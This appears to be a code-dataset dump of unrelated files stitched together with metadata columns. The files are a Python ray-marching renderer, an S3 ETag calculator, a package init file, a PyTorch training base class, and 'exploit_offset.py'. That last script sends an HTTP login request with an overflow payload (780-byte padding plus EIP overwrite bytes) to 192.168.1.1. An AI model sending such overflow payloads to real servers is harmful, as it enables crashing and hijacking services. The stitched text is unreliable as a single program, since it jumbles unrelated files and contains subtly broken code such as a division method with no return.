sphereLight1=Sphere(location=Vector3D(15.0,8.0,-5.0),radius=0.01,colour=Vector3D(255.0,255.0,255.0),diffuse=True,refractiveIndex=1.0,brightness=2500000.0)
objectList=[ground,backWall,leftWall,rightWall,frontWall,topLight,sphere1,sphere2,sphere3,sphereLight1]
#These loop through every pixel in the image.
for pixelX in tqdm(range(0,imageWidth)):
for pixelY in range(0,imageHeight):
currentPixelColour=Vector3D(0.0,0.0,0.0)
rayDirection=getCameraRayUnitVector(pixelX=pixelX,pixelY=pixelY,imageWidth=imageWidth,imageHeight=imageHeight,cameraLocation=cameraLocation,
aspectRatio=aspectRatio,screenDistance=screenDistance)
currentPixelColour+=marchRay(currentRecursiveDepth=0,rayOrigin=cameraLocation,originObject=None,rayDirection=rayDirection,objectList=objectList,
minimumCollisionDistance=minimumCollisionDistance,maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
imageData[(imageHeight-1)-pixelY,pixelX,:]=[currentPixelColour.x,currentPixelColour.y,currentPixelColour.z] #Y axis is inverted so the image is displayed the correct way up while using imshow().
#The RGB intensity values are scaled from 0 to 1 so they can be interpreted correctly by the imshow() function.
imageDataMaximumValue=numpy.amax(imageData)
imageData/=imageDataMaximumValue
plt.imshow(imageData)
plt.show() | 64.6759 | 229 | 0.710853 | import copy
import math
import numpy
from tqdm import tqdm
import matplotlib.pyplot as plt
#A class for three-dimentional vector operations; using numpy arrays and their operations was found to be slower.
class Vector3D():
x=0.0
y=0.0
z=0.0
def __init__(self,x,y,z):
self.x=x
self.y=y
self.z=z
def __add__(self,b):
return Vector3D(self.x+b.x,self.y+b.y,self.z+b.z)
def __sub__(self,b):
return Vector3D(self.x-b.x,self.y-b.y,self.z-b.z)
def __mul__(self,b):
if((type(b)==float) or (type(b)==int)):
return Vector3D(self.x*b,self.y*b,self.z*b) #Scalar multiplication
else:
return Vector3D(self.x*b.x,self.y*b.y,self.z*b.z) #Element wise multiplication
def __truediv__(self,b):
if((type(b)==float) or (type(b)==int)):
return Vector3D(self.x/b,self.y/b,self.z/b) #Scalar division
else:
Vector3D(self.x/b.x,self.y/b.y,self.z/b.z) #Element wise division
def dotProduct(self,b):
return (self.x*b.x)+(self.y*b.y)+(self.z*b.z)
def crossProduct(self,b):
newX=(self.y*b.z)-(self.z*b.y)
newY=(self.z*b.x)-(self.x*b.z)
newZ=(self.x*b.y)-(self.y*b.x)
return Vector3D(newX,newY,newZ)
def lengthSquared(self):
return (self.x**2)+(self.y**2)+(self.z**2)
def length(self):
return math.sqrt(self.lengthSquared())
def getUnitVector(self):
return self/self.length()
#Returns the unit vector pointing from the location represented by fromVector to the location represented by toVector.
def getUnitVectorPointToPoint(toVector,fromVector):
differenceVector=toVector-fromVector
return differenceVector.getUnitVector()
#Returns the direction that the original ray used in rayMarch should be in in order to correspond to a certain pixel in the image given by the coordinates
#pixelX,pixelY. The camera is assumed to be a pinhole comera with an infinitely small aperture.
def getCameraRayUnitVector(pixelX,pixelY,imageWidth,imageHeight,cameraLocation,aspectRatio,screenDistance):
screenZ=screenDistance+cameraLocation.z
screenX=cameraLocation.x+numpy.interp(x=pixelX,xp=[0,imageWidth],fp=[-0.5*aspectRatio,0.5*aspectRatio]) #Maps pixel x ordinate to screen x ordinate.
screenY=cameraLocation.y+numpy.interp(x=pixelY,xp=[0,imageHeight],fp=[-0.5,0.5]) #Maps pixel y ordinate to screen y ordinate.
pixelLocation=Vector3D(float(screenX),float(screenY),float(screenZ))
return getUnitVectorPointToPoint(pixelLocation,cameraLocation)
class SceneObject():
location=0.0
colour=None
diffuse=True
refractiveIndex=1.0
brightness=0.0
def getNormalUnitVector(self,collisionPoint,rayIsInside):
return Vector3D(0.0,1.0,0.0)
def getReflectionVector(self,incomingUnitVector,normalUnitVector):
return incomingUnitVector-((normalUnitVector*(normalUnitVector.dotProduct(incomingUnitVector)))*2.0)
#Returns the angle that the incoming ray makes to the normal using the cosine rule.
def getIncomingAngle(self,negativeIncomingUnitVector,normalUnitVector):
negativeIncomingNormalDifferenceVector=negativeIncomingUnitVector-normalUnitVector
cosIncomingAngle=1.0-(0.5*negativeIncomingNormalDifferenceVector.lengthSquared())
return math.acos(cosIncomingAngle)
def isAboveCriticalAngle(self,incomingAngle,n1,n2): #Determines whether total internal reflection is occuring.
if(n2>n1):
return False #Total internal reflection only occurs when light is in a higher refractive index material and collides with an interface seperating a lower refractive index material.
return incomingAngle>=math.asin(n2/n1)
#Returns the refractive indices for both sides of the interface during a refractive process
def getRefractiveIndices(self,rayIsInside):
#It is assumed that refraction only occurs between this object and empty space (refractive index of 1.0), not between this
#object and another object embedded inside it.
n1=1.0 if(rayIsInside==False) else self.refractiveIndex
n2=self.refractiveIndex if(rayIsInside==False) else 1.0
return n1,n2
#Returns the reflection and refraction coefficients using Shlick's approximation (https://en.wikipedia.org/wiki/Schlick%27s_approximation) of the Frensel equations.
def getReflectionAndRefractionCoefficients(self,incomingAngle,n1,n2):
verticalReflectionIntensityFactor=((n1-n2)/(n1+n2))**2.0 #Reflection intensity for a ray of light travelling in the negative normal direction.
reflectionIntensityFactor=verticalReflectionIntensityFactor+((1-verticalReflectionIntensityFactor)*((1-math.cos(incomingAngle))**5.0))
return reflectionIntensityFactor,1.0-reflectionIntensityFactor
#Returns the information regarding reflection and refraction that occurs when rays of light transition between an interface between two refractive indices.
#Returns information in the following format: reflection vector, refraction vector,reflection intensity,refraction intensity.
def getReflectionAndRefraction(self,rayOrigin,collisionPoint,rayIsInside):
incomingUnitVector=getUnitVectorPointToPoint(collisionPoint,rayOrigin)
negativeIncomingUnitVector=incomingUnitVector*(-1.0)
normalUnitVector=self.getNormalUnitVector(collisionPoint,rayIsInside)
reflectionVector=self.getReflectionVector(incomingUnitVector=incomingUnitVector,normalUnitVector=normalUnitVector)
incomingAngle=self.getIncomingAngle(negativeIncomingUnitVector=negativeIncomingUnitVector,normalUnitVector=normalUnitVector)
n1,n2=self.getRefractiveIndices(rayIsInside=rayIsInside)
if(self.isAboveCriticalAngle(incomingAngle=incomingAngle,n1=n1,n2=n2)):
return reflectionVector,Vector3D(0.0,0.0,0.0),1.0,0.0 #No refraction occurs in this case; only total internal reflection.
negativeNormalUnitVector=normalUnitVector*(-1.0) #Used in construction of the final refracted vector
parallelVector=(negativeIncomingUnitVector.crossProduct(normalUnitVector)).crossProduct(normalUnitVector)
parallelUnitVector=parallelVector.getUnitVector() #Parallel to the surface of the object, used in construction of the final refracted vector.
sinRefractionAngle=(n1/n2)*math.sin(incomingAngle) #Calculated from Snell's law.
refractionAngle=math.asin(sinRefractionAngle)
#Below constructs the refraction vector from negativeNormalUnitVector and parallelUnitVector.
parallelUnitVectorFactor=math.tan(refractionAngle) #Assumes that the component of the refraction vector in the negative normal direction has a length of 1.
refractionVector=negativeNormalUnitVector+(parallelUnitVector*parallelUnitVectorFactor)
unitRefractionVector=refractionVector.getUnitVector()
reflectionIntensityFactor,refractionIntensityFactor=self.getReflectionAndRefractionCoefficients(incomingAngle=incomingAngle,n1=n1,n2=n2)
return reflectionVector,unitRefractionVector,reflectionIntensityFactor,refractionIntensityFactor
def isLight(self): #Returns if the brightness is positive, meaning that the object is a light.
return False if(self.brightness<=0.0) else True
#An infinite flat plane described by the equation ax+by+cz+d=0
class Plane(SceneObject):
normalUnitVector=None
d=0.0
def __init__(self,a,b,c,location,colour,diffuse,refractiveIndex,brightness):
self.normalUnitVector=Vector3D(a,b,c).getUnitVector() #From the point-normal definition of a plane
self.a=a
self.b=b
self.c=c
self.location=location
self.d=(-1.0)*((self.normalUnitVector).dotProduct(location)) #From the point-normal definition of a plane.
self.colour=colour.getUnitVector()
self.diffuse=diffuse
self.refractiveIndex=refractiveIndex
self.brightness=brightness
def getNormalUnitVector(self,collisionPoint,rayIsInside):
return self.normalUnitVector if(rayIsInside==False) else (self.normalUnitVector)*(-1.0) #The normal direction is swapped depending what side of the plane collisionPoint is on.
def SDF(self,collisionPoint):
return ((self.normalUnitVector).dotProduct(collisionPoint))+self.d #Perpendicular distance from point to plane (assuming that the normal vector is a unit vector) considering what side the point is to the plane.
def getBrightness(self,point):
return max(self.brightness,0.0) #Brightness for an infinite illuminated plane is always constant irrespective of the viewing location.
class Sphere(SceneObject):
radius=1.0
def __init__(self,location,radius,colour,diffuse,refractiveIndex,brightness):
self.location=location
self.radius=radius
self.colour=colour.getUnitVector()
self.diffuse=diffuse
self.refractiveIndex=refractiveIndex
self.brightness=brightness
def getNormalUnitVector(self,collisionPoint,rayIsInside):
normalUnitVector=getUnitVectorPointToPoint(collisionPoint,self.location) #Normal vectors for a sphere point from the centre to surface points.
return normalUnitVector if(rayIsInside==False) else (normalUnitVector)*(-1.0) #The normal direction is swapped depending if collisionPoint is internal or external to the sphere.
def SDF(self,collisionPoint):
pointToSphereCentreVector=self.location-collisionPoint
distanceToSphereCentre=pointToSphereCentreVector.length()
return distanceToSphereCentre-self.radius #Gives the distance from collisionPoint to the sphere's surface, is negative if collisionPoint is inside the sphere.
def getBrightness(self,point):
if(self.brightness<=0.0):
return 0.0
pointToSphereCentreVector=self.location-point
distanceSquaredToSphereCentre=pointToSphereCentreVector.lengthSquared()
return (self.brightness*(self.radius**2.0))/distanceSquaredToSphereCentre #Spherical lights use an inverse square relation for light intensity. Intensity is equal to the value of "brightness" at light surface.
#Determines the total intensity of red, green and blue light impacting point rayOrigin using the ray marching algorithm.
def marchRay(currentRecursiveDepth,objectList,originObject,rayOrigin,rayDirection,
minimumCollisionDistance,maximumRayMarchStepCount,maximumRayMarchDistance,
maximumRecursiveDepth,minimiseDiffuseInterreflections):
if(currentRecursiveDepth>=maximumRecursiveDepth):
return Vector3D(0.0,0.0,0.0) #The path to the camera via recursive calls of marchRay has become to long, no light is returned in this case.
currentRayEnd=copy.deepcopy(rayOrigin) #Holds the current endpoint of the extended ray that begins at the point rayOrigin.
currentStepCount=0
while(True):
if((currentStepCount>=maximumRayMarchStepCount) or (currentRayEnd.length()>=maximumRayMarchDistance)):
return Vector3D(0.0,0.0,0.0) #The ray has not intersected with anything within a specified number of steps or ray extension distance; the ray may have gone outside of the scene. No light is returned in this case.
closestObject=None
closestObjectDistance=10e12 #Holds the distance to the closest object
closestObjectRayIsInside=False #Holds whether the ray is would be colliding with closestObject from inside the object or not.
for currentObject in objectList:
if(currentObject==originObject): #If the current object being considered is the object that this call of rayMarch is being used on. Used during diffuse reflections.
continue
currentObjectDistance=currentObject.SDF(currentRayEnd) #The closest distance to the object is determined, with the sign determining what side the collision point is to the surface normals.
currentObjectAbsoluteDistance=math.fabs(currentObjectDistance)
if(currentObjectAbsoluteDistance<closestObjectDistance): #If a new closest object has been found to the ray end.
closestObject=currentObject
closestObjectDistance=currentObjectAbsoluteDistance
closestObjectRayIsInside=False if(currentObjectDistance>=0.0) else True
if(closestObjectDistance<=minimumCollisionDistance): #If the ray has collided with the closest object.
if(closestObject.isLight()==True): #If the object is a light, its colour scaled by its brightness at the ray origin is returned.
return closestObject.colour*closestObject.getBrightness(rayOrigin)
#In some circumstances multiple objects may have collisions occuring at currentRayEnd at the same time. If this happens, a ray sent from one of these objects another
#will need no iterations to collide, causing rayOrigin to equal currentRayEnd, meaning that the ray from one to the other will have zero length. To prevent this,
#the collision point is offset backwards along the incoming by a distance greater than minimumCollisionDistance in order to ensure that a ray going
#from this collided object always needs at least one iteration to collide with another object, ensuring that any ray emanating from the point rayOrigin has a non zero length.
reflectionRayOriginOffsetVector=rayDirection*minimumCollisionDistance*(-1.1)
reflectionRayOrigin=currentRayEnd+reflectionRayOriginOffsetVector
if(closestObject.diffuse==False): #If the object reflects and refracts light.
#If the ray is transitioning across the object's surface (either from inside to outside or outside to inside) the ray end is moved across the collision interface
#so that the new ray will not initally collide with the object that it was generated from.
closestObjectCollisionNormalUnitVector=closestObject.getNormalUnitVector(collisionPoint=currentRayEnd,rayIsInside=closestObjectRayIsInside)
refractionRayOriginOffsetVector=closestObjectCollisionNormalUnitVector*minimumCollisionDistance*2.0*(-1.1)
refractionRayOrigin=currentRayEnd+refractionRayOriginOffsetVector
reflectionVector,refractionVector,reflectionIntensityFactor,refractionIntensityFactor=closestObject.getReflectionAndRefraction(rayOrigin=rayOrigin,
collisionPoint=currentRayEnd,
rayIsInside=closestObjectRayIsInside)
reflectionIntensity=marchRay(currentRecursiveDepth=currentRecursiveDepth+1,objectList=objectList,originObject=None,
rayOrigin=reflectionRayOrigin,rayDirection=reflectionVector,minimumCollisionDistance=minimumCollisionDistance,
maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
refractionIntensity=marchRay(currentRecursiveDepth=currentRecursiveDepth+1,objectList=objectList,originObject=None,
rayOrigin=refractionRayOrigin,rayDirection=refractionVector,minimumCollisionDistance=minimumCollisionDistance,
maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
finalIntensities=(reflectionIntensity*reflectionIntensityFactor)+(refractionIntensity*refractionIntensityFactor)
return closestObject.colour*finalIntensities #The object's surface can reflect and refract red, green and blue light in different amounts.
#The light reflects diffusely for the object.
totalReflectedIntensity=Vector3D(0.0,0.0,0.0) #Carries the current sum of light intensity to be reflected off the object.
for currentObject in objectList:
if(currentObject==closestObject): #If the current object being considered is the object that this part of the function is being used on.
continue
if((minimiseDiffuseInterreflections==True) and (currentObject.isLight()==False)): #Minimising diffuse interreflection means that diffuse objects will only try to use
#lights and objects in the way of lights as light sources. This simplification can significantly reduce the number of total calculations needed for calculating the colour of a single pixel in the final image.
continue
lightDirectionUnitVector=getUnitVectorPointToPoint(currentObject.location,currentRayEnd)
incomingIntensity=marchRay(currentRecursiveDepth=currentRecursiveDepth+1,objectList=objectList,originObject=closestObject,
rayOrigin=reflectionRayOrigin,rayDirection=lightDirectionUnitVector,minimumCollisionDistance=minimumCollisionDistance,
maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
#The Lambertian reflectance model (https://en.wikipedia.org/wiki/Lambertian_reflectance) is used as a model for diffuse reflection.
surfaceNormalVector=closestObject.getNormalUnitVector(currentRayEnd,False)
reflectedIntensityScalingFactor=incomingIntensity*max(0.0,lightDirectionUnitVector.dotProduct(surfaceNormalVector))
reflectedIntensity=closestObject.colour*reflectedIntensityScalingFactor #The object's colour determines how much red, green and blue light is reflected.
totalReflectedIntensity+=reflectedIntensity #The intensity from the current light source is added to the total sum of reflected light intensity.
return totalReflectedIntensity
#No object intersections exist within a sphere centred at currentRayEnd with a radius of closestObjectDistance. The ray is therefore extended in rayDirection by
#a distance slightly smaller than closestObjectDistance (smaller to ensure the ray end will not end up inside an object).
currentRayEnd+=(rayDirection*0.98*closestObjectDistance)
currentStepCount+=1
aspectRatio=1.0
imageHeight=50
imageWidth=int(aspectRatio*imageHeight)
fieldOfView=math.pi/2.0
cameraLocation=Vector3D(0.0,0.0,0.0)
screenDistance=(0.5*aspectRatio)/(math.tan(fieldOfView/2.0)) #The screen is assumed to have a height of 1 unit, meaning that it's width is equal to "aspectRatio".
imageData=numpy.zeros(shape=(imageHeight,imageWidth,3))
minimumCollisionDistance=0.005
maximumRayMarchStepCount=400
maximumRayMarchDistance=300.0
maximumRecursiveDepth=7
minimiseDiffuseInterreflections=True
#The scene is created below
ground=Plane(a=0.0,b=1.0,c=0.0,location=Vector3D(0.0,-2.0,0.0),colour=Vector3D(255.0,70.0,40.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
backWall=Plane(a=0.0,b=0.0,c=-1.0,location=Vector3D(0.0,0.0,40.0),colour=Vector3D(170.0,180.0,250.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
leftWall=Plane(a=1.0,b=0.0,c=0.0,location=Vector3D(-20.0,0.0,-0.0),colour=Vector3D(230.0,240.0,50.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
rightWall=Plane(a=-1.0,b=0.0,c=0.0,location=Vector3D(20.0,0.0,20.0),colour=Vector3D(230.0,240.0,50.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
frontWall=Plane(a=0.0,b=0.0,c=1.0,location=Vector3D(0.0,0.0,-40.0),colour=Vector3D(100.0,190.0,170.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
topLight=Plane(a=0.0,b=-1.0,c=0.0,location=Vector3D(0.0,30.0,0.0),colour=Vector3D(255.0,255.0,255.0),diffuse=True,refractiveIndex=1.0,brightness=1.0)
sphere1=Sphere(location=Vector3D(-2.0,-0.25,5.0),radius=1.5,colour=Vector3D(215.0,250.0,190.0),diffuse=False,refractiveIndex=1.5,brightness=0.0)
sphere2=Sphere(location=Vector3D(0.5,1.0,6.0),radius=1.2,colour=Vector3D(255.0,255.0,255.0),diffuse=False,refractiveIndex=100.0,brightness=0.0)
sphere3=Sphere(location=Vector3D(1.5,0.6,3.0),radius=0.5,colour=Vector3D(80.0,40.0,120.0),diffuse=True,refractiveIndex=1.0,brightness=0.0)
sphereLight1=Sphere(location=Vector3D(15.0,8.0,-5.0),radius=0.01,colour=Vector3D(255.0,255.0,255.0),diffuse=True,refractiveIndex=1.0,brightness=2500000.0)
objectList=[ground,backWall,leftWall,rightWall,frontWall,topLight,sphere1,sphere2,sphere3,sphereLight1]
#These loop through every pixel in the image.
for pixelX in tqdm(range(0,imageWidth)):
for pixelY in range(0,imageHeight):
currentPixelColour=Vector3D(0.0,0.0,0.0)
rayDirection=getCameraRayUnitVector(pixelX=pixelX,pixelY=pixelY,imageWidth=imageWidth,imageHeight=imageHeight,cameraLocation=cameraLocation,
aspectRatio=aspectRatio,screenDistance=screenDistance)
currentPixelColour+=marchRay(currentRecursiveDepth=0,rayOrigin=cameraLocation,originObject=None,rayDirection=rayDirection,objectList=objectList,
minimumCollisionDistance=minimumCollisionDistance,maximumRayMarchStepCount=maximumRayMarchStepCount,maximumRayMarchDistance=maximumRayMarchDistance,
maximumRecursiveDepth=maximumRecursiveDepth,minimiseDiffuseInterreflections=minimiseDiffuseInterreflections)
imageData[(imageHeight-1)-pixelY,pixelX,:]=[currentPixelColour.x,currentPixelColour.y,currentPixelColour.z] #Y axis is inverted so the image is displayed the correct way up while using imshow().
#The RGB intensity values are scaled from 0 to 1 so they can be interpreted correctly by the imshow() function.
imageDataMaximumValue=numpy.amax(imageData)
imageData/=imageDataMaximumValue
plt.imshow(imageData)
plt.show() | 17,001 | 1,780 | 165 |
ce0779ba605786061035545a0272a055142dc5cc | 1,484 | py | Python | calc-s3-etag.py | aws-samples/calc-s3-etag | 09609ec170adce0ada5dfb73eb0f548f4d0dd3e2 | [
"MIT-0"
] | null | null | null | calc-s3-etag.py | aws-samples/calc-s3-etag | 09609ec170adce0ada5dfb73eb0f548f4d0dd3e2 | [
"MIT-0"
] | null | null | null | calc-s3-etag.py | aws-samples/calc-s3-etag | 09609ec170adce0ada5dfb73eb0f548f4d0dd3e2 | [
"MIT-0"
] | 1 | 2021-06-10T19:01:33.000Z | 2021-06-10T19:01:33.000Z | #// Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#// SPDX-License-Identifier: MIT-0
import sys
import hashlib
if len(sys.argv) !=3:
print("Usage: calc-s3-etag.py {file} {multipart-transfer size}")
print("")
print("Multipart transfersize may be gotten by referencing the .aws/config file or by using the following example commands to examine a large object uploaded to the SBE")
print("aws s3api head-object --bucket {bucketname} --key \"[prefix/]{objectname}\" --endpoint-url {url to SBE device including port}")
print("take the resulting content length and divide it by the number after the dash in the Etag. Take that result and divide it by 1048576")
print("the result will be slightly below the multi-part transfer chunk size measured in MB utilized in the transfer")
sys.exit(0)
mychunksize=int(sys.argv[2]) * 1024 * 1024
print(calculate_s3_etag(sys.argv[1],mychunksize))
| 41.222222 | 174 | 0.66779 | #// Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#// SPDX-License-Identifier: MIT-0
import sys
import hashlib
def calculate_s3_etag(file_path, chunk_size):
md5s = []
with open(file_path, 'rb') as fp:
while True:
data = fp.read(chunk_size)
if not data:
break
md5s.append(hashlib.md5(data))
if len(md5s) < 1:
return '"{}"'.format(hashlib.md5().hexdigest())
if len(md5s) == 1:
return '"{}"'.format(md5s[0].hexdigest())
digests = b''.join(m.digest() for m in md5s)
digests_md5 = hashlib.md5(digests)
return '"{}-{}"'.format(digests_md5.hexdigest(), len(md5s))
if len(sys.argv) !=3:
print("Usage: calc-s3-etag.py {file} {multipart-transfer size}")
print("")
print("Multipart transfersize may be gotten by referencing the .aws/config file or by using the following example commands to examine a large object uploaded to the SBE")
print("aws s3api head-object --bucket {bucketname} --key \"[prefix/]{objectname}\" --endpoint-url {url to SBE device including port}")
print("take the resulting content length and divide it by the number after the dash in the Etag. Take that result and divide it by 1048576")
print("the result will be slightly below the multi-part transfer chunk size measured in MB utilized in the transfer")
sys.exit(0)
mychunksize=int(sys.argv[2]) * 1024 * 1024
print(calculate_s3_etag(sys.argv[1],mychunksize))
| 532 | 0 | 23 |
72ce4745976e9c1bb7896987be9ec2993372dc7b | 173 | py | Python | startmicro/__init__.py | munisisazade/startmicro | 4c74f41a31a6bef9aaa09586628e8427a7d68851 | [
"MIT"
] | 1 | 2019-09-27T10:23:24.000Z | 2019-09-27T10:23:24.000Z | startmicro/__init__.py | munisisazade/startmicro | 4c74f41a31a6bef9aaa09586628e8427a7d68851 | [
"MIT"
] | 1 | 2020-09-01T06:50:19.000Z | 2020-09-01T06:50:19.000Z | startmicro/__init__.py | munisisazade/startmicro | 4c74f41a31a6bef9aaa09586628e8427a7d68851 | [
"MIT"
] | null | null | null | from startmicro.utils.version import get_version
VERSION = (0, 0, 6, 'alpha', 0)
__version__ = get_version(VERSION)
__author__ = "Munis Isazade <munisisazade@gmail.com>"
| 21.625 | 53 | 0.751445 | from startmicro.utils.version import get_version
VERSION = (0, 0, 6, 'alpha', 0)
__version__ = get_version(VERSION)
__author__ = "Munis Isazade <munisisazade@gmail.com>"
| 0 | 0 | 0 |
1b7fd39603cccc95e49b6ce348febb847840ef6b | 1,138 | py | Python | PoC1/exploit_offset.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | PoC1/exploit_offset.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | PoC1/exploit_offset.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import socket
try:
print "\n Sending ""evil"" buffer..."
padding = "A" * 780
eip = "B" * 4
buffer = "C" * 16
payload = padding + eip + buffer
content = "username=" + payload + "&password=A"
buffer = "POST /login HTTP/1.1\r\n"
buffer += "Host: 192.168.1.1\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://192.168.209.10/login\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: "+str(len(content))+"\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "\r\n"
buffer += content
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 80))
s.send(buffer)
s.close()
except:
print "Cloud not connect!"
| 28.45 | 104 | 0.581722 | #!/usr/bin/python
import socket
try:
print "\n Sending ""evil"" buffer..."
padding = "A" * 780
eip = "B" * 4
buffer = "C" * 16
payload = padding + eip + buffer
content = "username=" + payload + "&password=A"
buffer = "POST /login HTTP/1.1\r\n"
buffer += "Host: 192.168.1.1\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://192.168.209.10/login\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: "+str(len(content))+"\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "\r\n"
buffer += content
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 80))
s.send(buffer)
s.close()
except:
print "Cloud not connect!"
| 0 | 0 | 0 |
9a1dfacdee354f4a82f68846e5e83586c85bed27 | 7,323 | py | Python | core/base_model.py | Janspiry/distributed-pytorch-template | 8b612c8877d4ec3ffba28fcb3bc1ccfda44b6c10 | [
"MIT"
] | 3 | 2022-01-30T07:10:02.000Z | 2022-02-11T10:16:43.000Z | core/base_model.py | Janspiry/A-Seed-Project-For-Deep-Learning-by-Pytorch | 8b612c8877d4ec3ffba28fcb3bc1ccfda44b6c10 | [
"MIT"
] | null | null | null | core/base_model.py | Janspiry/A-Seed-Project-For-Deep-Learning-by-Pytorch | 8b612c8877d4ec3ffba28fcb3bc1ccfda44b6c10 | [
"MIT"
] | null | null | null | import os
from abc import abstractmethod
from functools import partial
import collections
import torch
import torch.nn as nn
import core.util as Util
from core.logger import LogTracker
CustomResult = collections.namedtuple('CustomResult', 'name result')
| 47.245161 | 156 | 0.62092 | import os
from abc import abstractmethod
from functools import partial
import collections
import torch
import torch.nn as nn
import core.util as Util
from core.logger import LogTracker
CustomResult = collections.namedtuple('CustomResult', 'name result')
class BaseModel():
def __init__(self, opt, phase_loader, val_loader, metrics, logger, writer):
""" init model with basic input, which are from __init__(**kwargs) function in inherited class """
self.opt = opt
self.phase = opt['phase']
self.set_device = partial(Util.set_device, rank=opt['global_rank'])
''' process record '''
self.batch_size = self.opt['datasets'][self.phase]['dataloader']['args']['batch_size']
self.epoch = 0
self.iter = 0
self.phase_loader = phase_loader
self.val_loader = val_loader
self.metrics = metrics
''' logger to log file, which only work on GPU 0. writer to tensorboard and result file '''
self.logger = logger
self.writer = writer
self.results_dict = CustomResult([],[]) # {"name":[], "result":[]}
def train(self):
while self.epoch <= self.opt['train']['n_epoch'] and self.iter <= self.opt['train']['n_iter']:
self.epoch += 1
if self.opt['distributed']:
''' sets the epoch for this sampler. When :attr:`shuffle=True`, this ensures all replicas use a different random ordering for each epoch '''
self.phase_loader.sampler.set_epoch(self.epoch)
train_log = self.train_step()
''' save logged informations into log dict '''
train_log.update({'epoch': self.epoch, 'iters': self.iter})
''' print logged informations to the screen and tensorboard '''
for key, value in train_log.items():
self.logger.info('{:5s}: {}\t'.format(str(key), value))
if self.epoch % self.opt['train']['save_checkpoint_epoch'] == 0:
self.logger.info('Saving the self at the end of epoch {:.0f}'.format(self.epoch))
self.save_everything()
if self.epoch % self.opt['train']['val_epoch'] == 0:
self.logger.info("\n\n\n------------------------------Validation Start------------------------------")
if self.val_loader is None:
self.logger.info('Validation stop where dataloader is None, Skip it.')
else:
val_log = self.val_step()
for key, value in val_log.items():
self.logger.info('{:5s}: {}\t'.format(str(key), value))
self.logger.info("\n------------------------------Validation End------------------------------\n\n")
self.logger.info('Number of Epochs/Iterations has reached the limit, End.')
def test(self):
pass
@abstractmethod
def train_step(self):
raise NotImplementedError('You must specify how to train your networks.')
@abstractmethod
def val_step(self):
raise NotImplementedError('You must specify how to do validation on your networks.')
def test_step(self):
pass
def print_network(self, network):
""" print network structure, only work on GPU 0 """
if self.opt['global_rank'] !=0:
return
if isinstance(network, nn.DataParallel) or isinstance(network, nn.parallel.DistributedDataParallel):
network = network.module
s, n = str(network), sum(map(lambda x: x.numel(), network.parameters()))
net_struc_str = '{}'.format(network.__class__.__name__)
self.logger.info('Network structure: {}, with parameters: {:,d}'.format(net_struc_str, n))
self.logger.info(s)
def save_network(self, network, network_label):
""" save network structure, only work on GPU 0 """
if self.opt['global_rank'] !=0:
return
save_filename = '{}_{}.pth'.format(self.epoch, network_label)
save_path = os.path.join(self.opt['path']['checkpoint'], save_filename)
if isinstance(network, nn.DataParallel) or isinstance(network, nn.parallel.DistributedDataParallel):
network = network.module
state_dict = network.state_dict()
for key, param in state_dict.items():
state_dict[key] = param.cpu()
torch.save(state_dict, save_path)
def load_network(self, network, network_label, strict=True):
if self.opt['path']['resume_state'] is None:
return
model_path = "{}_{}.pth".format(self. opt['path']['resume_state'], network_label)
self.logger.info('Loading pretrained model from [{:s}] ...'.format(model_path))
if isinstance(network, nn.DataParallel) or isinstance(network, nn.parallel.DistributedDataParallel):
network = network.module
network.load_state_dict(torch.load(model_path, map_location = lambda storage, loc: Util.set_device(storage)), strict=strict)
def save_training_state(self, optimizers, schedulers):
""" saves training state during training, only work on GPU 0 """
if self.opt['global_rank'] !=0:
return
assert isinstance(optimizers, list) and isinstance(schedulers, list), 'optimizers and schedulers must be a list.'
state = {'epoch': self.epoch, 'iter': self.iter, 'schedulers': [], 'optimizers': []}
for s in schedulers:
state['schedulers'].append(s.state_dict())
for o in optimizers:
state['optimizers'].append(o.state_dict())
save_filename = '{}.state'.format(self.epoch)
save_path = os.path.join(self.opt['path']['checkpoint'], save_filename)
torch.save(state, save_path)
